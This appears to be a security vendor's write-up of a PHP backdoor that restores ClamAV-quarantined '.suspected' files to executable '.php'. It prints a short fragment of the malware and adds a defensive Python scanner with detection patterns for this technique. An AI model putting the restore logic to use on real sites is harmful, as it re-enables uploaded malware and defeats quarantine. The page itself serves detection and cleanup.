A backdoor that renames files quarantined by ClamAV with the .suspected extension back to .php, re-enabling malicious files uploaded earlier or left behind by a previous attack. The attacker uses it to try to regain control of an infected website where malicious files were previously uploaded.
This malicious code affects any vulnerable or compromised website that is configured to interpret the scripting language.
Inspect your site's files, especially theme-related ones, for code you don't recognize. Look for any encoded or obfuscated PHP code.
Also, you can sign up with us and let our team remove the malware for you.
$dir = scandir("..");
foreach ($dir as $dirr)
    if (strpos($dirr, ".suspected"))
        $newdirr = str_replace(".suspected", "", $dirr);
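
An added defensive example (not part of the original page or of the malware sample): a Python scan of a web root that flags PHP files handling ".suspected" names, as the fragment above does, and lists files that still carry the quarantine suffix. The function names, the list of calls treated as suspicious and the sample tree are assumptions constructed for illustration.

```python
import re
import tempfile
from pathlib import Path

# Heuristic (an assumption of this example): PHP source that mentions the
# ".suspected" suffix next to a listing or rename-style call needs manual review.
SUFFIX = re.compile(rb"""["']\.suspected["']""")
CALLS = re.compile(rb"\b(scandir|glob|opendir|str_replace|substr|rename|copy)\s*\(")
PHP_EXTS = (".php", ".phtml", ".inc")

def scan_webroot(root):
    """Return (flagged, quarantined): PHP files that handle '.suspected'
    names, and files that still carry the quarantine suffix."""
    root, flagged, quarantined = Path(root), [], []
    for path in sorted(p for p in root.rglob("*") if p.is_file()):
        rel = path.relative_to(root).as_posix()
        if path.name.endswith(".suspected"):
            quarantined.append(rel)  # neutralised copy: record, do not parse
            continue
        if not path.name.lower().endswith(PHP_EXTS):
            continue
        try:
            data = path.read_bytes()
        except OSError:
            continue  # unreadable file: skip rather than abort the scan
        calls = sorted({m.decode() for m in CALLS.findall(data)})
        if SUFFIX.search(data) and calls:
            flagged.append((rel, calls))
    return flagged, quarantined

def demo():
    """Scan a constructed sample tree (not real site data)."""
    with tempfile.TemporaryDirectory() as tmp:
        theme = Path(tmp, "themes", "example")
        theme.mkdir(parents=True)
        samples = {
            # Fragment shown on this page, used as the positive case.
            "functions.php": b'<?php $dir = scandir(".."); foreach ($dir as $dirr) '
                             b'if (strpos($dirr, ".suspected")) '
                             b'$newdirr = str_replace(".suspected", "", $dirr);',
            "index.php": b"<?php echo 'hello';",  # benign control
            "shell.php.suspected": b"<?php /* quarantined */",
        }
        for name, body in samples.items():
            (theme / name).write_bytes(body)
        return scan_webroot(tmp)

if __name__ == "__main__":
    print(demo())
```

A flagged file is a lead for manual review, not a verdict; comparing the quarantined list between scans shows whether quarantined files have disappeared since the last run.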